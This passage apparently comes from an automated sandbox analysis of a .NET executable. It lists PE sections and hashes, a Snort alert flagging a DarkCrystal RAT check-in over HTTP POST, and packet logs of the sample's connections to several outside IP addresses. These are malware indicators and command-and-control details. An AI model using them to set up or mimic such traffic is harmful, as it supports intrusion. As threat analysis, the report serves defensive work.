                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                    Sections

                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                    .text0x20000x1fb3e40x1fb400c51e133e404dbc5c6c1954cc13a29a13unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                    .rsrc0x1fe0000x3700x4002d9810ece9366bcfe74ca488f145a40cFalse0.37890625data2.867353130536527IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                    .reloc0x2000000xc0x2004567c0c476ec2cd9f94012a2f7597a16False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                    Resources

                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                    RT_VERSION0x1fe0580x318data0.44823232323232326

                                                                                                                                    Imports

                                                                                                                                    DLLImport
                                                                                                                                    mscoree.dll_CorExeMain

                                                                                                                                    Network Behavior

                                                                                                                                    Snort IDS Alerts

                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                    04/19/24-13:42:33.224120TCP2048095ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)4973980192.168.2.4104.21.57.61

                                                                                                                                    Network Port Distribution

                                                                                                                                    TCP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Apr 19, 2024 13:41:58.391726971 CEST49730443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:41:58.391804934 CEST4434973034.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:41:58.391896009 CEST49730443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:41:58.403053999 CEST49730443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:41:58.403130054 CEST4434973034.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:41:58.632786036 CEST4434973034.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:41:58.632992029 CEST49730443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:41:58.636801004 CEST49730443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:41:58.636852026 CEST4434973034.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:41:58.637164116 CEST4434973034.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:41:58.679184914 CEST49730443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:41:58.679721117 CEST49730443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:41:58.724190950 CEST4434973034.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:41:58.864670992 CEST4434973034.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:41:58.864845037 CEST4434973034.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:41:58.864922047 CEST49730443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:41:58.869555950 CEST49730443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:41:58.872390985 CEST49731443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:41:58.872428894 CEST4434973134.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:41:58.872490883 CEST49731443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:41:58.872792006 CEST49731443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:41:58.872802973 CEST4434973134.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:41:59.092210054 CEST4434973134.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:41:59.093965054 CEST49731443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:41:59.093978882 CEST4434973134.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:41:59.331171036 CEST4434973134.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:41:59.331610918 CEST4434973134.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:41:59.331671000 CEST49731443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:41:59.331944942 CEST49731443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:41:59.636425018 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:41:59.636537075 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:41:59.636625051 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:41:59.645993948 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:41:59.646069050 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.083591938 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.083786964 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.087069035 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.087095976 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.087528944 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.088579893 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.136161089 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.469463110 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.469505072 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.471076012 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.471101999 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.471345901 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.471371889 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.472310066 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.472352028 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.472444057 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.472455025 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.472541094 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.472563028 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.472599983 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.472614050 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.472655058 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.472666025 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.472703934 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.472716093 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.472747087 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.472755909 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.472779989 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.472788095 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.472820044 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.472829103 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.472872019 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.472881079 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.472902060 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.472913027 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.472956896 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.472965956 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.472996950 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.473006964 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.473073959 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.473120928 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.473123074 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.473155975 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.473161936 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.473202944 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.473232031 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.473241091 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.473253965 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.473274946 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.473284006 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.473367929 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.473376036 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.473400116 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.473408937 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.473452091 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.473463058 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.473499060 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.473509073 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.473541975 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.473551035 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.473596096 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.473603964 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.473694086 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:00.474138975 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.494394064 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:00.538590908 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:01.561234951 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:01.561327934 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:01.561363935 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:01.561443090 CEST44349732149.154.167.220192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:01.561501980 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:01.562009096 CEST49732443192.168.2.4149.154.167.220
                                                                                                                                    Apr 19, 2024 13:42:33.119082928 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:33.223753929 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:33.223844051 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:33.224119902 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:33.328352928 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:33.328784943 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:33.329711914 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:33.474992037 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:33.711438894 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:33.711503029 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:33.711541891 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:33.711566925 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:33.848263025 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:33.880670071 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:33.934123039 CEST4974080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:33.985230923 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:33.985332012 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:33.985574007 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.038408995 CEST8049740104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.038506985 CEST4974080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.038744926 CEST4974080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.131942987 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.143039942 CEST8049740104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.143064976 CEST8049740104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.143234015 CEST4974080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.247694969 CEST8049740104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.261830091 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.261862040 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.262082100 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.300662994 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.405031919 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.405599117 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.405795097 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.498954058 CEST8049740104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.499017954 CEST8049740104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.499094009 CEST4974080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.510258913 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.620609045 CEST4974080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.621573925 CEST4974180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.682418108 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.682482958 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.682615042 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.725228071 CEST8049740104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.725313902 CEST4974080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.725982904 CEST8049741104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.726088047 CEST4974180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.726541042 CEST4974180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.830910921 CEST8049741104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.830943108 CEST8049741104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:34.831384897 CEST4974180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:34.936065912 CEST8049741104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:35.172565937 CEST8049741104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:35.172627926 CEST8049741104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:35.173054934 CEST4974180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:35.528666019 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:35.528850079 CEST4974180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:35.529920101 CEST4974280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:35.633728981 CEST8049741104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:35.633826971 CEST4974180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:35.633994102 CEST8049739104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:35.634089947 CEST4973980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:35.634820938 CEST8049742104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:35.635047913 CEST4974280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:35.645311117 CEST4974380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:35.752018929 CEST8049743104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:35.752253056 CEST4974380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:35.752336979 CEST4974380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:35.858159065 CEST8049743104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:35.858709097 CEST8049743104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:35.859002113 CEST4974380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:35.966344118 CEST8049743104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:36.223082066 CEST8049743104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:36.223144054 CEST8049743104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:36.223546982 CEST4974380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:36.421838045 CEST4974380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:36.450879097 CEST4974480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:36.529078960 CEST8049743104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:36.529266119 CEST4974380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:36.555656910 CEST8049744104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:36.555890083 CEST4974480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:36.556998968 CEST4974480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:36.661509037 CEST8049744104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:36.661571980 CEST8049744104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:36.661927938 CEST4974480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:36.766714096 CEST8049744104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:36.900268078 CEST4974280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.047378063 CEST8049744104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.047442913 CEST8049744104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.047636032 CEST4974480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.175561905 CEST4974480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.186424017 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.265070915 CEST4974880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.280322075 CEST8049744104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.280584097 CEST4974480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.290339947 CEST49749443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:42:37.290421963 CEST4434974934.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.290528059 CEST49749443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:42:37.291054010 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.291153908 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.291600943 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.293764114 CEST49749443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:42:37.293838978 CEST4434974934.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.369781971 CEST8049748104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.369874001 CEST4974880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.369956970 CEST4974880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.396234035 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.396292925 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.396503925 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.474246025 CEST8049748104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.474834919 CEST8049748104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.474993944 CEST4974880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.501287937 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.501347065 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.501382113 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.501383066 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.501421928 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.501439095 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.509172916 CEST4434974934.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.509375095 CEST49749443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:42:37.513623953 CEST49749443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:42:37.513689995 CEST4434974934.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.513947964 CEST4434974934.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.579307079 CEST8049748104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.587512016 CEST49749443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:42:37.605966091 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.606069088 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.606549025 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.607110977 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.647352934 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.647424936 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.675621033 CEST49749443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:42:37.710906029 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.710963011 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.710979939 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.710999966 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.711033106 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.711033106 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.711054087 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.711087942 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.711443901 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.711503029 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.711564064 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.711682081 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.711715937 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.711750984 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.711770058 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.711836100 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.711998940 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.712050915 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.712162971 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.712563038 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.712660074 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.716151953 CEST4434974934.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.752094030 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.752173901 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.752178907 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.752274036 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.809896946 CEST4434974934.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.809953928 CEST4434974934.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.810134888 CEST49749443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:42:37.810633898 CEST49749443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:42:37.811309099 CEST49750443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:42:37.811336994 CEST4434975034.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.811568975 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.811599016 CEST49750443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:42:37.811810017 CEST49750443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:42:37.811816931 CEST4434975034.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.812684059 CEST4974880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.815627098 CEST8049747104.21.57.61192.168.2.4
